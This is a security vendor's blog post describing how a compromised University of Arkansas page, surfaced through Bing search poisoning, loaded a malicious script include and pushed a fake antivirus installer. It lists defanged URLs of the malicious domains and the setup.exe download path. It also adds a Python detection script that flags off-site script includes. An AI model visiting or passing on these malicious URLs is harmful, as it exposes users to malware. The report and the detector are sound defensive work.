Yet Another Reputable Site Asks You to Install Rogue AV


Posted by: Barracuda Labs

Yet another reputable site has fallen victim to compromise — University of Arkansas.

This Tuesday, Barracuda’s Malicious Javascript Detection engine (MJD) identified Rogue AV software being distributed from a page that belongs to the University of Arkansas Web site. When users accessed a particular page on the university Web site, it opened a window warning them that their computer was infected with viruses and then downloaded what claimed to be anti-virus software, which was identified as fake anti-virus software.

A forensic analysis of the attack revealed that the user requested the following:

hxxp://bumperscollege.uark.edu/ssp_director/inc/html/d/georgia-inmate-query.html

which in turn requested JavaScript from a malicious domain via a script include:

hxxp://xrusx.com/counter.php?sref=bumperscollege.uark.edu/ssp_director/inc/html/d/georgia-inmate-query.html

which contained further malicious JavaScript includes that generated fake warning messages on the user’s computer.

setup.exe was linked off another malicious domain:

hxxp://www.loker.us/forum/attachments/setup.exe

While tracing the user’s steps to determine how the user got to this page, we made yet another interesting discovery. Our investigation could not find the user browsing any University of Arkansas page that linked directly to the malicious page distributing the Rogue AV. Instead, it was a Bing search result that led the user to this page. Specifically, one customer using the Barracuda Purewire Web Security Service searched for ‘georgiainmatequery’ on the Microsoft Bing search engine.

hxxp://www.bing.com/search?q=georgiainmatequery

As you can see, the malicious link from uArk.edu shows up in the Bing search results, in the number two spot. The page is leveraging uArk.edu’s reputation ranking in what we’ve previously reported on as SEO poisoning (see previous post). This is becoming increasingly popular: hackers are targeting vulnerabilities in legitimate Web sites, since it makes the malicious page more likely to be visited. While search engines have been proactively adding malware scanning to their arsenal, legitimate Web site owners also need to take proactive steps to keep their sites free of such malicious content.
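The chain described above starts with an off-site script include whose query string carries the compromised page's own address (the sref= parameter). The check below is an added example, not Barracuda's MJD code: it lists a page's third-party script includes and flags that pattern, and its hostnames, allowlist and sample HTML are constructed for illustration.

```python
from html.parser import HTMLParser
from urllib.parse import urljoin, urlsplit, parse_qsl

class _ScriptSrcCollector(HTMLParser):
    """Collect the src attribute of every <script> tag in a document."""
    def __init__(self):
        super().__init__()
        self.sources = []

    def handle_starttag(self, tag, attrs):
        if tag == "script":
            src = dict(attrs).get("src")
            if src:
                self.sources.append(src.strip())

def audit_script_includes(html, page_url, allowed_hosts=()):
    """Return (src, host, leaks_page_url) for each off-site script include.

    leaks_page_url is True when a query value contains the page's own host,
    as the sref= parameter in the post does.
    """
    page_host = (urlsplit(page_url).hostname or "").lower()
    trusted = {page_host} | {h.lower() for h in allowed_hosts}
    collector = _ScriptSrcCollector()
    collector.feed(html)
    findings = []
    for src in collector.sources:
        # urljoin resolves relative and protocol-relative (//host/x) sources.
        target = urlsplit(urljoin(page_url, src))
        host = (target.hostname or "").lower()
        if host in trusted:
            continue
        values = [v.lower() for _, v in parse_qsl(target.query)]
        findings.append((src, host, any(page_host in v for v in values)))
    return findings

# Constructed sample: a page with one local, one allowlisted and one
# unexpected include that reports the page address back to its host.
SAMPLE_PAGE_URL = "http://www.example.edu/inc/html/d/some-query.html"
SAMPLE_HTML = """<html><head>
<script src="/js/site.js"></script>
<script src="//cdn.example.org/lib.js"></script>
<script src="http://counter.example.net/counter.php?sref=www.example.edu/inc/html/d/some-query.html"></script>
</head><body>content</body></html>"""

if __name__ == "__main__":
    allow = ("cdn.example.org",)  # hypothetical allowlist of expected hosts
    for src, host, leaks in audit_script_includes(SAMPLE_HTML, SAMPLE_PAGE_URL, allow):
        print(f"off-site script from {host} (carries page URL: {leaks}): {src}")
```

Run against every HTML file under the web root, any finding on a host outside the allowlist is a page to inspect for injected content.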

Customers using the Barracuda Purewire Web Security Service are protected from this attack.
